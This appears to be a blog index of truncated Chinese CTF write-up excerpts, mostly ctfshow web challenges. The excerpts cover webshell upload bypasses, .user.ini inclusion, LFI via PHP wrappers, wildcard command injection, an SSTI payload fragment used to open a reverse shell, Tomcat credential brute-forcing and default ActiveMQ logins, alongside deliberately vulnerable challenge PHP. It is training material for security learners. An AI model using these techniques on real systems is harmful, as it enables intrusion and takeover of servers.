web151 前台校验不可靠 上个改后缀的🐎(.png)，抓包改php即可上🐎成功 web152 后端校验要严密 同上题，应该是MIME校验吧，注意Content-Type: image/png就行，如果一开始就上的是图片🐎，就不需要改这个了 web153 后端校验要严密 这里改php后缀不好使了，考虑上传.user.ini文件来包含图片🐎 我的.…

web89 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if…

web78 <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 伪协议读取即可 另外提一嘴，hackerbar自带的LFI功能已经预带了一个filter伪协议，可以一键…

web118 hint：<!-- system($code);--> 尝试了一下，如果被waf了会显示evil input，那就fuzz一下，发现只有小写字母和部分符号没被过滤 考虑用bash的内置变量来构造命令，问号没有被ban，可以用通配符来匹配读取的文件，如????.???->flag.php bash内置命令： https…

web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } ?c=system("ls…

web 星愿信箱 进去是个输入框，fuzz一下，过滤了{{ }}、__import__等字符，在网上找一个{% %}的payload，稍微改改就行，这里无回显，于是弹shell payload： {%set x=().__class__.__base__.__subclasses__()[N].__init__.__globals__ …

打人民CC期间打的一个比赛，web的质量个人感觉挺适合我这种小登的（除了测测你的🐎，卡了蛮久，最后第二次上马出来的时候让我感觉有些脑） *为未解出，赛后复现 WEB 我们一起来下棋吧 藏在源码里 ez_md5 <?php error_reporting(0); highlight_file(__FILE__); $a=$_GET['a…

web21 前置知识：tomcat 认证爆破之custom iterator使用：https://www.cnblogs.com/007NBqaq/p/13220297.html 这里爆破的内容是账号密码，但是是被base64加密过的并且格式是xx：xx 这里需要用到bp的Sniper模式，payload选择custom iterator（自定义迭…

我发现我太菜了，于是决定开始刷show X_x web1 在页面注释 web11 域名其实也可以隐藏信息，比如ctfshow.com 就隐藏了一条信息 通过dns检查查询flag https://zijian.aliyun.com/ TXT 记录，一般指为某个主机名或域名设置的说明。 通过Dns检查查询Flag. web13 技术文档里面不要出现敏…

赛题1-activeMQ 提示了activeMQ，登录给的http://10.1.5.252:5001/发现是个登录页面，在网上查询activeMQ的初始密码 username：admin password：admin 直接登陆进去 登录攻击机后先用ifconfig命令查ip 题目环境在协会内网（10.1），此时协会内网就是题目里的外网环境，攻击机…